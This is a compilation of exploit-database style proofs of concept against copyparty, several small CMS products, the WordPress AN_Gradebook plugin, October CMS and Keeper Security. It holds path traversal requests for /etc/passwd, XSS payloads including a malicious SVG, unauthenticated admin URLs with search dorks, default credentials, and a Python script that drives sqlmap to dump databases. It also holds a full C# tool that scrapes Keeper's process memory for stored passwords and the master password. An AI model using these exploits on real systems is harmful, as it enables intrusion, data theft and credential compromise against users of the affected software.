<pre><code># Exploit Title: copyparty 1.8.2 - Directory Traversal<br /># Date: 14/07/2023<br /># Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)<br /># Vendor Homepage: https://github.com/9001/copyparty/<br /># Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2<br /># Version: <=1.8.2<br /># Tested on: Debian Linux<br /># CVE : CVE-2023-37474<br /><br /><br /><br /><br />#Description<br />Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.<br /><br />#POC<br />curl -i -s -k -X GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'<br /><br /></code></pre>
<pre><code># Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)<br /># Date: 23/07/2023<br /># Exploit Author: Vartamtezidis Theodoros (@TheHackyDog)<br /># Vendor Homepage: https://github.com/9001/copyparty/<br /># Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6<br /># Version: <=1.8.6<br /># Tested on: Debian Linux<br /># CVE : CVE-2023-38501<br /><br /><br /><br />#Description<br />Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. <br /><br />Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.<br /><br />#POC<br />https://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E<br /><br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMSninesol v1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.ninesol.com | <br />| # Dork : |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] use payload : /download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E<br /><br />[+] http://127.0.0.1/comwaveedupk/download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMSdosma v5.0 Unauthorized Administrative Access Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 73.0.1(32-bit) |<br />| # Vendor : http://dosmacommunications.co.za/home/ | <br />| # Dork : intext:www.feliciabuthelezi.co.za. All rights Reserved |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Allows full control of the website<br /><br />[+] Use payload : /admin/addreview.php?p=insertreview<br /><br />[+] http://127.0.0.1/feliciabuthelezicoza/admin/addreview.php?p=insertreview<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>#!/usr/bin/python3<br /><br /># Exploit Title: WordPress Plugin AN_Gradebook <= 5.0.1 - Subscriber+ SQLi<br /># Date: 2023-07-26<br /># Exploit Author: Lukas Kinneberg<br /># Github: https://github.com/lukinneberg/CVE-2023-2636<br /># Vendor Homepage: https://wordpress.org/plugins/an-gradebook/<br /># Software Link: https://github.com/lukinneberg/CVE-2023-2636/blob/main/an-gradebook.7z<br /># Tested on: WordPress 6.2.2<br /># CVE: CVE-2023-2636<br /><br /><br />from datetime import datetime<br />import os<br />import requests<br />import json<br /><br /># User Input:<br />target_ip = 'CHANGE_THIS'<br />target_port = '80'<br />username = 'hacker'<br />password = 'hacker'<br /><br />banner = '''<br /><br /> ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ <br />||C |||V |||E |||- |||2 |||0 |||2 |||3 |||- |||2 |||6 |||3 |||6 ||<br />||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||<br />|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|<br /> Exploit Author: Lukas Kinneberg<br /><br />'''<br /><br />print(banner)<br /><br />print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /><br /># Authentication:<br />session = requests.Session()<br />auth_url = 'http://' + target_ip + ':' + target_port + '/wp-login.php'<br />check = session.get(auth_url)<br /># Header:<br />header = {<br /> 'Host': target_ip,<br /> 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',<br /> 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br /> 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Origin': 'http://' + target_ip,<br /> 'Connection': 'close',<br /> 'Upgrade-Insecure-Requests': '1'<br />}<br /><br /># Body:<br />body = {<br /> 'log': username,<br /> 'pwd': password,<br /> 'wp-submit': 'Log In',<br /> 'testcookie': '1'<br />}<br />auth = session.post(auth_url, headers=header, data=body)<br /><br /># SQL-Injection (Exploit):<br /># Generate payload for sqlmap<br />cookies_session = session.cookies.get_dict()<br />cookie = json.dumps(cookies_session)<br />cookie = cookie.replace('"}','')<br />cookie = cookie.replace('{"', '')<br />cookie = cookie.replace('"', '')<br />cookie = cookie.replace(" ", '')<br />cookie = cookie.replace(":", '=')<br />cookie = cookie.replace(',', '; ')<br /><br />print('[*] Payload for SQL-Injection:')<br /><br /># Enter the URL path of the course after the target_port below<br />exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + r'/wp-admin/admin-ajax.php?action=course&id=3" '<br />exploitcode_risk = '--level 2 --risk 2 '<br />exploitcode_cookie = '--cookie="' + cookie + '" '<br /><br /><br /># SQLMAP Printout<br />print(' Sqlmap options:')<br />print(' -a, --all Retrieve everything')<br />print(' -b, --banner Retrieve DBMS banner')<br />print(' --current-user Retrieve DBMS current user')<br />print(' --current-db Retrieve DBMS current database')<br />print(' --passwords Enumerate DBMS users password hashes')<br />print(' --tables Enumerate DBMS database tables')<br />print(' --columns Enumerate DBMS database table column')<br />print(' --schema Enumerate DBMS schema')<br />print(' --dump Dump DBMS database table entries')<br />print(' --dump-all Dump all DBMS databases tables entries')<br />retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')<br />exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p id -v 0 --answers="follow=Y" --batch'<br />os.system(exploitcode)<br />print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /> <br /><br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMSJerusalem Weather Forecast v1.3 Directory Traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(64-bit) | <br />| # Vendor : https://www.behance.net/user/?username=galizorea | <br />| # Dork : Designed by Gali Zorea |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /small.php?section=../../../../../../../../../etc/passwd<br /><br />[+] http://target_site/small.php?section=../../../../../../../../../etc/passwd<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>#Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)<br />#Date: 29 June 2023<br />#Exploit Author: Okan Kurtulus<br />#Vendor Homepage: https://octobercms.com<br />#Version: v3.4.4<br />#Tested on: Ubuntu 22.04<br />#CVE : N/A<br /><br /># Proof of Concept:<br />1– Install the system through the website and log in with any user with file upload authority.<br />2– Select "Media" in the top menu. Prepare an SVG file using the payload below.<br />3– Upload the SVG file and call the relevant file from the directory it is in. XSS will be triggered.<br /><br />#Stored XSS Payload:<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(1);<br /> </script><br /></svg><br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Yourdoctor CMS v1.4 Unauthorised Administrative Access Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : https://codecanyon.net/item/yourdoctor-medical-and-doctor-website-cms/20811493 | <br />| # Dork : "Lorem ipsum dolor sit amet, omnis signiferumque in mei, mei ex." |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] Unauthorized administrator access. Allows any visitor to Download subscriber list.<br /><br />[+] use payload : /admin/subscriber-csv.php<br /><br />[+] http://127.0.0.1/admin/subscriber-csv.php<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code># Exploit Title: Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping<br /># Google Dork: NA<br /># Date: 22-07-2023<br /># Exploit Author: H4rk3nz0<br /># Vendor Homepage: https://www.keepersecurity.com/en_GB/<br /># Software Link: https://www.keepersecurity.com/en_GB/get-keeper.html<br /># Version: Desktop App version 16.10.2 & Browser Extension version 16.5.4<br /># Tested on: Windows<br /># CVE : CVE-2023-36266<br /><br />using System;<br />using System.Management;<br />using System.Diagnostics;<br />using System.Linq;<br />using System.Runtime.InteropServices;<br />using System.Text;<br />using System.Text.RegularExpressions;<br />using System.Collections.Generic;<br /><br />// Keeper Security Password vault Desktop application and Browser Extension stores credentials in plain text in memory<br />// This can persist after logout if the user has not explicitly enabled the option to 'clear process memory'<br />// As a result of this one can extract credentials & master password from a victim after achieving low priv access<br />// This does NOT target or extract credentials from the affected browser extension (yet), only the Windows desktop app.<br />// Github: https://github.com/H4rk3nz0/Peeper<br /><br />static class Program<br />{<br /> // To make sure we are targetting the right child process - check command line<br /> public static string GetCommandLine(this Process process)<br /> {<br /> if (process is null || process.Id < 1)<br /> {<br /> return "";<br /> }<br /> string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}";<br /> using (var searcher = new ManagementObjectSearcher(query))<br /> using (var collection = searcher.Get())<br /> {<br /> var managementObject = collection.OfType<ManagementObject>().FirstOrDefault();<br /> return managementObject != null ? (string)managementObject["CommandLine"] : "";<br /> }<br /> }<br /><br /> //Extract plain text credential JSON strings (regex inelegant but fast)<br /> public static void extract_credentials(string text)<br /> {<br /> int index = text.IndexOf("{\"title\":\"");<br /> int eindex = text.IndexOf("}");<br /> while (index >= 0)<br /> {<br /> try<br /> {<br /> int endIndex = Math.Min(index + eindex, text.Length);<br /> Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))");<br /> string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();<br /><br /> int match_cut = match.IndexOf("} ");<br /> if (match_cut != -1 )<br /> {<br /> match = match.Substring(0, match_cut + "} ".Length).TrimEnd();<br /> if (!stringsList.Contains(match) && match.Length > 20)<br /> {<br /> Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "} ".Length) + "\n");<br /> stringsList.Add(match);<br /> }<br /><br /> } else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20)<br /> {<br /> Console.WriteLine("->Credential Record Found : " + match + "\n");<br /> stringsList.Add(match.TrimEnd());<br /> }<br /> index = text.IndexOf("{\"title\":\"", index + 1);<br /> eindex = text.IndexOf("}", eindex + 1);<br /> }<br /> catch<br /> {<br /> return;<br /> }<br /><br /> }<br /> }<br /><br /> // extract account/email containing JSON string<br /> public static void extract_account(string text)<br /> {<br /> int index = text.IndexOf("{\"expiry\"");<br /> int eindex = text.IndexOf("}");<br /> while (index >= 0)<br /> {<br /> try<br /> {<br /> int endIndex = Math.Min(index + eindex, text.Length);<br /> Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)");<br /> string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();<br /> if ((match.Length > 2))<br /> {<br /> Console.WriteLine("->Account Record Found : " + match + "\n");<br /> return;<br /> }<br /> index = text.IndexOf("{\"expiry\"", index + 1);<br /> eindex = text.IndexOf("}", eindex + 1);<br /> }<br /> catch<br /> {<br /> return;<br /> }<br /> }<br /><br /> }<br /><br /> // Master password not available with SSO based logins but worth looking for.<br /> // Disregard other data key entries that seem to match: _not_master_key_example<br /> public static void extract_master(string text)<br /> {<br /> int index = text.IndexOf("data_key");<br /> int eindex = index + 64;<br /> while (index >= 0)<br /> {<br /> try<br /> {<br /> int endIndex = Math.Min(index + eindex, text.Length);<br /> Regex reg = new Regex("(data_key[ -~]+)");<br /> var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();<br /> Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})");<br /> if (match_one.Replace("data_key", "").Length > 5)<br /> {<br /> if (!clean.IsMatch(match_one.Replace("data_key", "")))<br /> {<br /> Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n");<br /> }<br /><br /> }<br /> index = text.IndexOf("data_key", index + 1);<br /> eindex = index + 64;<br /> }<br /> catch<br /> {<br /> return;<br /> }<br /><br /> }<br /> }<br /><br /> // Store extracted strings and comapre <br /> public static List<string> stringsList = new List<string>();<br /><br /> // Main function, iterates over private committed memory pages, reads memory and performs regex against the pages UTF-8<br /> // Performs OpenProcess to get handle with necessary query permissions<br /> static void Main(string[] args)<br /> {<br /> foreach (var process in Process.GetProcessesByName("keeperpasswordmanager"))<br /> {<br /> string commandline = GetCommandLine(process);<br /> if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7"))<br /> {<br /> Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString());<br /> Console.WriteLine("->Searching...\n");<br /> IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id);<br /> IntPtr address = new IntPtr(0x10000000000);<br /> MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION();<br /> while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0)<br /> {<br /> if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000)<br /> {<br /> byte[] buffer = new byte[(int)memInfo.RegionSize];<br /> if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0)<br /> {<br /> string text = Encoding.ASCII.GetString(buffer);<br /> extract_credentials(text);<br /> extract_master(text);<br /> extract_account(text);<br /> }<br /> }<br /><br /> address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64());<br /> }<br /><br /> CloseHandle(processHandle);<br /><br /> }<br /><br /> }<br /><br /> }<br /><br /> [DllImport("kernel32.dll")]<br /> public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId);<br /><br /> [DllImport("kernel32.dll")]<br /> public static extern bool CloseHandle(IntPtr hObject);<br /><br /> [DllImport("ntdll.dll")]<br /> public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead);<br /><br /> [DllImport("kernel32.dll", SetLastError = true)]<br /> public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength);<br /><br /> [StructLayout(LayoutKind.Sequential)]<br /> public struct MEMORY_BASIC_INFORMATION<br /> {<br /> public IntPtr BaseAddress;<br /> public IntPtr AllocationBase;<br /> public uint AllocationProtect;<br /> public IntPtr RegionSize;<br /> public uint State;<br /> public uint Protect;<br /> public uint Type;<br /> }<br />}<br /><br /></code></pre>
<pre><code>======================================================================================================================================<br />| # Title : Buzzy - News Viral Lists Polls and Videos V 2.5.2 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4 | <br />| # Dork : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved." |<br />======================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] appears to leave default credentials installed after installation.<br /><br />[+] Use Admin : admin@admin.com & Pass : admin<br /><br />[+] http://wwclickhungamacom/<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>